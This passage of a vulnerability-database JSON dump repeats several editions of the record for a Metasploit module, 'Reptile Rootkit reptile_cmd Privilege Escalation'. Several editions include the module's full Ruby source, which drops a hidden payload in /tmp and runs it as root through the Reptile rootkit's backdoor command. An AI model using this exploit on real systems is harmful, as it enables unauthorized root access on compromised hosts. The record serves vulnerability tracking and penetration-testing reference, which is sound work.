vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-09T12:10:40", "differentElements": ["modified", "published"], "edition": 123}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-09T16:17:23", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:4721441048035722493", "KITPLOIT:1262817431567678644", "KITPLOIT:4541124670182347551"]}, {"type": "cve", "idList": ["CVE-2019-14898", "CVE-2020-7287", "CVE-2020-12771", "CVE-2020-12680", "CVE-2020-11541", "CVE-2020-12768", "CVE-2020-12769", "CVE-2020-7285", "CVE-2020-12770", "CVE-2019-20794"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2031"]}], "modified": "2020-05-09T16:17:23", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2020-05-09T16:17:23", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-09T16:17:23", "differentElements": ["sourceData"], "edition": 124}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-11T04:29:41", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1262817431567678644", "KITPLOIT:4541124670182347551", "KITPLOIT:4721441048035722493"]}, {"type": "cve", "idList": ["CVE-2020-7287", "CVE-2020-11541", "CVE-2020-12680", "CVE-2019-14898", "CVE-2020-12768", "CVE-2020-12770", "CVE-2020-12771", "CVE-2019-20794", "CVE-2020-12769", "CVE-2020-7285"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2031"]}], "modified": "2020-05-11T04:29:41", "rev": 2}, "score": {"value": 4.0, "vector": "NONE", "modified": "2020-05-11T04:29:41", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-11T04:29:41", "differentElements": ["sourceData"], "edition": 125}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-11T06:21:44", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:2049", "RHSA-2020:2065", "RHSA-2020:2063", "RHSA-2020:2050", "RHSA-2020:2048", "RHSA-2020:2046", "RHSA-2020:2047"]}, {"type": "kitploit", "idList": ["KITPLOIT:8246541048034228632", "KITPLOIT:7880986323422091516"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:DED58B42EA917DE1411B940A1AD42835"]}, {"type": "thn", "idList": ["THN:79C92226DDE2C60317F9D780D7E337BD"]}, {"type": "threatpost", "idList": ["THREATPOST:103AFBDE6D261555120729CAF7A921A4"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0643-1", "OPENSUSE-SU-2020:0621-1"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-635.NASL", "OPENSUSE-2020-627.NASL", "SUSE_SU-2020-1179-1.NASL", "DEBIAN_DLA-2207.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5676"]}], "modified": "2020-05-11T06:21:44", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-05-11T06:21:44", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-11T06:21:44", "differentElements": ["sourceData"], "edition": 126}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-12T10:46:11", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:2049", "RHSA-2020:2065", "RHSA-2020:2070", "RHSA-2020:2069", "RHSA-2020:2071", "RHSA-2020:2047", "RHSA-2020:2063", "RHSA-2020:2048", "RHSA-2020:2046", "RHSA-2020:2050"]}, {"type": "kitploit", "idList": ["KITPLOIT:7880986323422091516", "KITPLOIT:8246541048034228632"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:DED58B42EA917DE1411B940A1AD42835"]}, {"type": "thn", "idList": ["THN:79C92226DDE2C60317F9D780D7E337BD"]}, {"type": "threatpost", "idList": ["THREATPOST:103AFBDE6D261555120729CAF7A921A4"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0643-1", "OPENSUSE-SU-2020:0621-1"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-624.NASL", "FEDORA_2020-FA71CA92F8.NASL"]}], "modified": "2020-05-12T10:46:11", "rev": 2}, "score": {"value": 3.0, "vector": "NONE", "modified": "2020-05-12T10:46:11", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-12T10:46:11", "differentElements": ["sourceData"], "edition": 127}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-12T12:29:37", "history": [], "viewCount": 62, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "avleonov", "idList": ["AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "kitploit", "idList": ["KITPLOIT:3402516504541757577", "KITPLOIT:6824279770707710960"]}, {"type": "redhat", "idList": ["RHSA-2020:2085", "RHSA-2020:2103", "RHSA-2020:2116", "RHSA-2020:2082", "RHSA-2020:2102", "RHSA-2020:2117"]}, {"type": "krebs", "idList": ["KREBS:624B1220BE77E7AB3787B1E8D51C774E"]}, {"type": "mskb", "idList": ["KB4540705", "KB4540688", "KB4550930", "KB4550927", "KB4550951", "KB4541506", "KB4550939", "KB4540681", "KB4540693"]}], "modified": "2020-05-12T12:29:37", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-05-12T12:29:37", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-12T12:29:37", "differentElements": ["modified", "published"], "edition": 128}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-13T04:29:15", "history": [], "viewCount": 62, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:2126", "RHSA-2020:2082", "RHSA-2020:2102", "RHSA-2020:2085", "RHSA-2020:2117", "RHSA-2020:2103", "RHSA-2020:2116"]}, {"type": "avleonov", "idList": ["AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "kitploit", "idList": ["KITPLOIT:6824279770707710960", "KITPLOIT:3402516504541757577"]}, {"type": "krebs", "idList": ["KREBS:624B1220BE77E7AB3787B1E8D51C774E"]}, {"type": "cve", "idList": ["CVE-2020-12826", "CVE-2020-6245", "CVE-2020-6252"]}, {"type": "mskb", "idList": ["KB4550951", "KB4541506", "KB4540693", "KB4540688", "KB4550930"]}], "modified": "2020-05-13T04:29:15", "rev": 2}, "score": {"value": 4.0, "vector": "NONE", "modified": "2020-05-13T04:29:15", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-13T04:29:15", "differentElements": ["modified", "published"], "edition": 129}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-13T10:42:03", "history": [], "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0A9FF260770515B1AE0D8A9CDFEFDEA1"]}, {"type": "thn", "idList": ["THN:50C2029CD06D2D7F06B4142DBC1A4E56", "THN:956E33D4B29C7F96F73E292451CB1A46"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892176", "OPENVAS:1361412562310704685", "OPENVAS:1361412562310892210"]}, {"type": "exploitdb", "idList": ["EDB-ID:48472", "EDB-ID:48473"]}, {"type": "redhat", "idList": ["RHSA-2020:2171", "RHSA-2020:2169"]}, {"type": "kitploit", "idList": ["KITPLOIT:8373701518620808878"]}, {"type": "threatpost", "idList": ["THREATPOST:754BCE09C77E05D5FF580DBFEB8A0938", "THREATPOST:7C714B04D173D29CA1EDD33A0D9FD7D6"]}, {"type": "securelist", "idList": ["SECURELIST:9B20628F21A6D65A468B95654F7C98AD"]}, {"type": "amazon", "idList": ["ALAS-2020-1364", "ALAS-2020-1365", "ALAS-2020-1367", "ALAS-2020-1366", "ALAS-2020-1363"]}], "modified": "2020-05-13T10:42:03", "rev": 2}, "score": {"value": 0.8, "vector": "NONE", "modified": "2020-05-13T10:42:03", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n 